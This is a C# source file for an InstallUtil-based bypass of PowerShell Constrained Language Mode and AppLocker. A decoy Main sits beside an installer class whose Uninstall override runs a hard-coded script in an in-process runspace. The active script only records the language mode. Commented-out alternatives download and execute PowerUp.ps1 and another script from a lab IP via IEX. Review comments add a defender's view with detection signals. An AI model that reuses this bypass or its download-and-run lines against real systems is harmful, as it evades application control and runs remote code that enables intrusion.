Bypass_CLM_And_AppLocker.cs
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass
{
/// <summary>
/// Executable entry point. It only prints a fixed message; the file's real logic
/// is in the installer class <c>Sample</c>, which this method never calls.
/// </summary>
/// <remarks>
/// NOTE(review): for triage, running or statically reading only <c>Main</c> gives a
/// misleading picture of the assembly. Enumerate types marked
/// <c>[RunInstaller(true)]</c> as well.
/// </remarks>
class Program
{
    /// <summary>Writes the decoy message to standard output and returns.</summary>
    /// <param name="args">Command-line arguments; not read.</param>
    static void Main(string[] args) =>
        Console.WriteLine("This is the main method which is a decoy");
}
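/// <summary>
/// Installer component whose <c>Uninstall</c> override hosts a PowerShell runspace
/// inside the current process and runs one hard-coded script in it.
/// </summary>
/// <remarks>
/// The script executes through System.Management.Automation loaded into this
/// process, so no powershell.exe process is started for it.
/// NOTE(review), defender view: the RunInstaller / Installer / Uninstall shape is
/// the one installer tooling such as InstallUtil.exe looks for (MITRE ATT&amp;CK
/// T1218.004). Useful signals are installer-utility executions against assemblies
/// in user-writable paths, System.Management.Automation.dll image loads in
/// processes other than the PowerShell hosts, and PowerShell script block logging
/// (event ID 4104). Application-control policy that blocks the installer utility
/// for standard users removes the launch path. Confirm all of this against the
/// environment's own policy.
/// </remarks>
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    /// <summary>
    /// Runs the hard-coded script in a freshly created runspace.
    /// </summary>
    /// <param name="savedState">Installer state dictionary; not read, and the base
    /// implementation is not called.</param>
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        // Active script: writes the runspace's language mode to a file, which makes
        // it a test of whether Constrained Language Mode applies to this host.
        // NOTE(review): C:\Windows\Tasks is presumably chosen because standard users
        // can write there; file-creation telemetry on that directory is a cheap detection.
        String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Windows\\Tasks\\test.txt";
        // String cmd = "(New-Object System.Net.WebClient).DownloadString('http://192.168.45.233/PowerUp.ps1') | IEX; Invoke-AllChecks | Out-File -FilePath .\\tc.txt"; //Just Invoke-Allchecks with Powerup and writes a file.
        // String cmd = "try { (New-Object System.Net.WebClient).DownloadString('http://192.168.45.233/run.txt') | IEX } catch { $_ | Format-List * -Force | Out-String | Out-File -FilePath .\\exc.txt}"; // Downloads run.txt and runs, if catches any exception, writes in to exc.txt.

        // Both Runspace and PowerShell are IDisposable. The original closed the
        // runspace only on the success path and never disposed the PowerShell
        // object, so an exception from Invoke() leaked both.
        using (Runspace rs = RunspaceFactory.CreateRunspace())
        {
            rs.Open();
            using (PowerShell ps = PowerShell.Create())
            {
                ps.Runspace = rs;
                ps.AddScript(cmd);
                ps.Invoke();
            }
        } // disposing the runspace also closes it, replacing the explicit Close()
    }
}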
}